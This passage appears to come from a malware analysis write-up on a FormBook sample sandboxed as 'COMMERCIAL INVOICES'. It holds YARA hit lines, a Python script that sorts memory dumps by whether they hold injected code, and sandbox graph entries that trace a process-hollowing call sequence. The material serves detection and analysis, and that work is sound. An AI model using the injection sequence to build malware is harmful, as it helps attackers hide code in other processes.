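• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
"""

HIT_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<source>\S+?\.sdmp)")

# Standard winnt.h memory-protection and region-type constants.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000
PAGE_EXECUTE_MASK = 0xF0  # PAGE_EXECUTE* values are 0x10, 0x20, 0x40, 0x80


def parse_dump_name(name):
    """Split a Joe Sandbox .sdmp name into the fields used for triage.

    ASSUMPTION (not documented on this page): the dotted fields are
    <target id>.<dump kind>.<dump id>.<base address>.<protection>.<flags>.
    <region type>.<reserved>, with protection and region type holding the
    winnt.h values. The <flags> field is not decoded here.
    """
    parts = name[:-len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    return {
        "target": int(parts[0]),       # target IDs on this page are all < 10
        "base": int(parts[3], 16),
        "protect": int(parts[4], 16),
        "type": int(parts[6], 16),
    }


def classify(protect, mem_type):
    """Executable memory that is not backed by an image section is the dump to
    pull first: legitimately loaded modules are MEM_IMAGE, so private or mapped
    executable memory is either JIT output or a written-in payload."""
    executable = (protect & PAGE_EXECUTE_MASK) != 0
    if executable and mem_type != MEM_IMAGE:
        return "unpacked-or-injected code (executable, not image-backed)"
    if executable:
        return "executable image section"
    return "data region (non-executable)"


def triage(report_text):
    """Group the hits per target process; one row per distinct memory region,
    ordered by base address, with every rule that fired on it."""
    regions = defaultdict(lambda: defaultdict(set))
    for line in report_text.splitlines():
        m = HIT_RE.search(line)
        if not m:
            continue
        r = parse_dump_name(m.group("source"))
        regions[r["target"]][(r["base"], r["protect"], r["type"])].add(m.group("rule").strip())

    result = {}
    for target, hits in sorted(regions.items()):
        result[target] = [
            {
                "base": base,
                "protect": PAGE_PROTECT.get(protect, hex(protect)),
                "type": MEM_TYPE.get(mem_type, hex(mem_type)),
                "verdict": classify(protect, mem_type),
                "rules": sorted(rules),
            }
            for (base, protect, mem_type), rules in sorted(hits.items())
        ]
    return result


if __name__ == "__main__":
    for target, rows in triage(REPORT_LINES).items():
        print(f"Target ID {target}:")
        for row in rows:
            print(f"  {row['base']:#010x}  {row['protect']:<22} {row['type']:<11} "
                  f"{row['verdict']}  [{', '.join(row['rules'])}]")
```

Run as-is it prints one row per region for targets 4, 5, 6 and 9. Two rows are worth calling out: in target 4 the PAGE_EXECUTE_READWRITE MEM_PRIVATE region at 0x00400000 sits at the default image base of a 32-bit PE while the process's own image base is 0x770000, which is what a manually mapped second PE looks like; in target 6 (taskkill.exe) the two PAGE_READWRITE private hits are data, and the executable mapped region at 0x00850000 is the dump to open in a disassembler.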


                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:5.1%
                                                                                                                                                                                                                                      Total number of Nodes:175
                                                                                                                                                                                                                                      Total number of Limit Nodes:12
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f95b50a814c7b4dda151780d07dcd7f2e760fb3b8d514cfdf39cc2ff7b38e61d
• Instruction ID: 5673767fe7203771a0a4946dc44c724fc50a5cd112ca2522703e8fada2625125
• Opcode Fuzzy Hash: f95b50a814c7b4dda151780d07dcd7f2e760fb3b8d514cfdf39cc2ff7b38e61d
• Instruction Fuzzy Hash: DD327BB0B012059FDB15DB79C5A0BAEBBF6AF89300F6444A9E505DB3A1CB35ED01CB61
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f68fce320a02efe2dfd0a0dfda9f19e665a3f0c9478c35de580969cffed1dac
• Instruction ID: c4c68a3e8be028f07767329a071d2c077f3e3b14cab7d9b2e1c915f87b63d63d
• Opcode Fuzzy Hash: 9f68fce320a02efe2dfd0a0dfda9f19e665a3f0c9478c35de580969cffed1dac
• Instruction Fuzzy Hash: 347108B1D15629DBDB28CF66C8457E9FBB6BF89300F1091AAD40DA6290EB705A85CF40

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 02BAD0BE
• GetCurrentThread.KERNEL32 ref: 02BAD0FB
• GetCurrentProcess.KERNEL32 ref: 02BAD138
• GetCurrentThreadId.KERNEL32 ref: 02BAD191
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 837e383d8ca6280b1af4e273ec441290540722128a9b48713ae94319402a65e0
• Instruction ID: 624ef18f4987d7e47a14f967c5049160deda646c479a590f47ea591be9bb5af3
• Opcode Fuzzy Hash: 837e383d8ca6280b1af4e273ec441290540722128a9b48713ae94319402a65e0
• Instruction Fuzzy Hash: 315159B4A007498FDB14DFA9D948BAEBFF1FF49304F208599E509A73A0D7385984CB61

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 02BAD0BE
• GetCurrentThread.KERNEL32 ref: 02BAD0FB
• GetCurrentProcess.KERNEL32 ref: 02BAD138
• GetCurrentThreadId.KERNEL32 ref: 02BAD191
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 542bb7fce4af6d6116a72ba84d1e409318584874ca0d8b9bfe26c107d159232a
• Instruction ID: bc43707a83bdcc65866097e6f1fa3de45d49097d07e844e3f20f12b8c5d91047
• Opcode Fuzzy Hash: 542bb7fce4af6d6116a72ba84d1e409318584874ca0d8b9bfe26c107d159232a
• Instruction Fuzzy Hash: 2F5178B49007498FDB14DFA9D948BAEBBF5FF48304F208599E409A7360D7385984CB61

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07134F9E
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 473d4d85e45cb8ea9213083ffdac7804f9ea82d9aa57124a1d95f35799f4a49d
• Instruction ID: f7a1781608834ac7e5089b309c832510121e8abe78d2035c67ab2f98421857ad
• Opcode Fuzzy Hash: 473d4d85e45cb8ea9213083ffdac7804f9ea82d9aa57124a1d95f35799f4a49d
• Instruction Fuzzy Hash: 71A17CB0D0025ADFDB21CF68C891BEDBBB2FF48314F1485A9D809A7290DB759985CF91

Control-flow Graph
(basic-block edge list omitted; the graph's API call node is CreateProcessA at block 7134ef7-7134fb1)

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07134F9E
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 4c997e79a885b00dd8ad5547796e40ab4c25817e01d0c025766f0af8a54875ff
• Instruction ID: 70fa8d06ea9fc134cbe8c646fc8290b9fa6bb59f07bb0a9d3c8b958076b23991
• Opcode Fuzzy Hash: 4c997e79a885b00dd8ad5547796e40ab4c25817e01d0c025766f0af8a54875ff
• Instruction Fuzzy Hash: F6916BB1D0025ACFEB21CF68C851BEDBBB2FF48314F1485A9D809A7290DB759985CF91

Control-flow Graph
(basic-block edge list omitted; the graph's API call node is CreateActCtxA at block 2ba5918-2ba59d9)

APIs
• CreateActCtxA.KERNEL32(?), ref: 02BA59C9
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 88c26b01d16f1ad272138df7288bada6121555e303d18140c29f67dd05315acb
• Instruction ID: 3a16ec4dc3dad4f9e447c26ceb8b7ef23ce6f7994aeb351609a073b91642e4e3
• Opcode Fuzzy Hash: 88c26b01d16f1ad272138df7288bada6121555e303d18140c29f67dd05315acb
• Instruction Fuzzy Hash: 6F5113B1C00719CFDB24DFAAC88479EBBF5BF49304F2080AAD419AB251D7756A49CF90

Control-flow Graph
(basic-block edge list omitted; the graph's API call node is CreateActCtxA at block 2ba44b4-2ba59d9)

APIs
• CreateActCtxA.KERNEL32(?), ref: 02BA59C9
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: ed8257b4e08cdf241ee04a323c05ae7ac5addb136a8765af5d9f1eb8d9e9b0f0
• Instruction ID: 91a332e27654cf7ef6fe0f8e75884e3d658a1ec9283a819888b55f8a523f96f4
• Opcode Fuzzy Hash: ed8257b4e08cdf241ee04a323c05ae7ac5addb136a8765af5d9f1eb8d9e9b0f0
• Instruction Fuzzy Hash: 1D4104B0D0071DCBDB24CFA9C84478EBBB5FF49304F20806AD419AB255DB755945CF90

Control-flow Graph
(basic-block edge list omitted; the graph's API call node is WriteProcessMemory at block 713473e-713477d)

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07134770
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 3627f8952feef1ccb0903f1780d1e0d20560237b186d7e4dcd0914997a4f757e
• Instruction ID: bbaaefaf5ebf5bf55ffd952698779965a9dff931193d4ceb336bdf3ceca9f9d6
• Opcode Fuzzy Hash: 3627f8952feef1ccb0903f1780d1e0d20560237b186d7e4dcd0914997a4f757e
• Instruction Fuzzy Hash: 55215AB59003499FCB10DFAAC885BEEBFF5FF49310F508429E958A7250C7789944CBA0

Control-flow Graph
(basic-block edge list omitted; the graph's API call node is WriteProcessMemory at block 713473e-713477d)

APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07134770
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 13c4fca8b3261109420435a056f1cc69a8bb361536dc60ba09484ee5988f4148
• Instruction ID: 9ac0225af5065daa332499796208044bec99a59bc3e243ffc117bf071d406981
• Opcode Fuzzy Hash: 13c4fca8b3261109420435a056f1cc69a8bb361536dc60ba09484ee5988f4148
• Instruction Fuzzy Hash: 9A2136B59003599FCB10DFAAC885BEEBFF5FF48310F10842AE919A7250C7789944CBA0

Control-flow Graph
(basic-block edge list omitted; the graph's API call node is Wow64SetThreadContext at block 71345a3-71345d3)

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071345C6
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 9c8594999713e9bf52508ae045e6ad7ad32a77affeec8286f801cb34d0715110
• Instruction ID: 7e4256c8d8ff441ea6bff159ad062cef97476e80aa49f5cc3bb30955c47bf26e
• Opcode Fuzzy Hash: 9c8594999713e9bf52508ae045e6ad7ad32a77affeec8286f801cb34d0715110
• Instruction Fuzzy Hash: BE2168B1D002498FDB10DFAAC4847EEBFF1EF88310F10842AD859A7240CB789945CFA0

Control-flow Graph (basic blocks and edges; graph legend omitted): 7134bc8-7134c5d (ReadProcessMemory) -> 7134c66-7134c96; 7134bc8-7134c5d -> 7134c5f-7134c65 -> 7134c66-7134c96
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07134C50
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 21ac0a55fd63169499a09df59d64f9744d224dbbbe19f6b2e94f08d73ccbee4b
• Instruction ID: edb42f4bcec31409618987e554b8d1c4eb005f8ca9241651fc9729c5e5c2ed63
• Opcode Fuzzy Hash: 21ac0a55fd63169499a09df59d64f9744d224dbbbe19f6b2e94f08d73ccbee4b
• Instruction Fuzzy Hash: 562119B1D002599FCF14DFAAC985AEEBBF5FF48310F508429E959A7250C7399944CBA0

Control-flow Graph (basic blocks and edges; graph legend omitted): 2bad689-2bad724 (DuplicateHandle) -> 2bad72d-2bad74a; 2bad689-2bad724 -> 2bad726-2bad72c -> 2bad72d-2bad74a
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BAD717
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: d50fa6c133fcb8ee39cd201805e28f958e5f75b61ce22547fe3885b60cb35f8a
• Instruction ID: 013119b089b66b3196d4ab77f09cf77f27020e3cf74aa0a3e72275d86cc0c977
• Opcode Fuzzy Hash: d50fa6c133fcb8ee39cd201805e28f958e5f75b61ce22547fe3885b60cb35f8a
• Instruction Fuzzy Hash: 8021E4B5900249DFDB10CFAAD984ADEBFF5FB48314F14845AE918A7350C378A944CFA1
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071345C6
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: b0027b4f62ce2cdf804330a5039f0a114bc58c6e431673b2e149a69956cad1f3
• Instruction ID: c765f363fbcfc749a1e75d5ae56d53595aa099a57b7021299a28bd712aed81eb
• Opcode Fuzzy Hash: b0027b4f62ce2cdf804330a5039f0a114bc58c6e431673b2e149a69956cad1f3
• Instruction Fuzzy Hash: 312149B1D003098FDB10DFAAC4857EEBBF4EF88310F10842AD819A7240CB78A944CFA0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07134C50
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: ace6bcfb25c255619efb14560328051e7785a30c4211fed9ac3c2b86a3cdaa5f
• Instruction ID: e58288c15cd122e09c60b56d9002598d1f0d20e55806f411059fe24cca840214
• Opcode Fuzzy Hash: ace6bcfb25c255619efb14560328051e7785a30c4211fed9ac3c2b86a3cdaa5f
• Instruction Fuzzy Hash: 052109B1D003599FCB10DFAAC985AEEFBF5FF48310F508429E959A7250C7789544CBA0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BAD717
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 041f5ad65a5965da99dfa9cdf72a47af84ad5ea29f78199e1e2878fac329c4c6
• Instruction ID: 8a3152565c4ead50400b855126c4c8fd6a473855e8e6c78e4be28f2e402af2ad
• Opcode Fuzzy Hash: 041f5ad65a5965da99dfa9cdf72a47af84ad5ea29f78199e1e2878fac329c4c6
• Instruction Fuzzy Hash: 7F21C4B59002499FDB10CF9AD584ADEBFF9FB48310F14845AE918A3350D378A954CFA5
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0713468E
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9a0fb9e91cf00e787161bc0812ff42e017e1d78f13969febcfed69a44c9428f8
• Instruction ID: 88ba93e9473b2dd1ee01aa2e3f7f3139e90b51db66c24b384eeab4750ec06a02
• Opcode Fuzzy Hash: 9a0fb9e91cf00e787161bc0812ff42e017e1d78f13969febcfed69a44c9428f8
• Instruction Fuzzy Hash: 172129B58002499FCB10DFAAC844AEFBFF5EF89320F248819E559A7250C7799950CFA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 7404e8f7cb88b468d29f288b4b372411c73de5c39663f0d2ee59224fb43fcdc4
• Instruction ID: 9fe2b50d2aa9c30535889046c850be1c8f2497cc61df87b9e8f74cc9a6ea4852
• Opcode Fuzzy Hash: 7404e8f7cb88b468d29f288b4b372411c73de5c39663f0d2ee59224fb43fcdc4
• Instruction Fuzzy Hash: 16115EB1C003898FCB10DFAAC5457AEFFF5EF89320F248419D459A7250C7796944CBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0713468E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02BAAFFE
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 02BAAFFE
Memory Dump Source
• Source File: 00000000.00000002.2378013072.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ba0000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07136FFD
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07136FFD
Memory Dump Source
• Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Memory Dump Source
• Source File: 00000000.00000002.2377545719.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f5d000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4405460ae52a293c97faf1d4fc2adb2248620e9783e3a8543f375a8687f46e17
                                                                                                                                                                                                                                      • Instruction ID: 9098359b5d9d2b8aaa30f2e2ac662886be6ee29c8dbc5f4a1f9c2297eec3ffc5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4405460ae52a293c97faf1d4fc2adb2248620e9783e3a8543f375a8687f46e17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 272165755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377545719.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f5d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                      • Instruction ID: 53694f5396d18d590eaeb5a3d4b611d01ea33a5b0e23e5e8a869f04b32dbc9bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3110372804240CFDB16CF00D5C4B16BF72FB94324F24C6A9DD490B656C33AE85ADBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2377646267.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_107d000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                      • Instruction ID: e13e34b5ec51edd3c26ada1358e668545c2c1f6abd6984447acc7fcb7604cc5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6611BB75904280DFDB02CF54C5C4B15BFA1FF84224F28C6A9D9894B296C33AD40BCB62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 797b230253a8f725fa42f59068a92dd7b0da7ab40d932a8a6777c4c1a3938d19
                                                                                                                                                                                                                                      • Instruction ID: eac4cd9069afd744a5be421c12756cd5524abd501109d532a83b3a63bf5a14c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 797b230253a8f725fa42f59068a92dd7b0da7ab40d932a8a6777c4c1a3938d19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBE1E7B5E001198FCB14DFA9C9809AEFBB2BF89305F24D169D818AB356D731AD41CF61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d6c7dcc58b3020e3abc0f4fe8932edac18fe4e9c2ff0afbced7bedd97bccf82f
                                                                                                                                                                                                                                      • Instruction ID: 0fac47ff57c3c47c6928e809295ad2d01052817070aac0b9678eb1806eb35d5f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6c7dcc58b3020e3abc0f4fe8932edac18fe4e9c2ff0afbced7bedd97bccf82f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CE1EAB5E001198FCB14DFA9C580AAEFBB2BF89305F24D169D418AB35AD731AD41CF61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2382255542.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7130000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
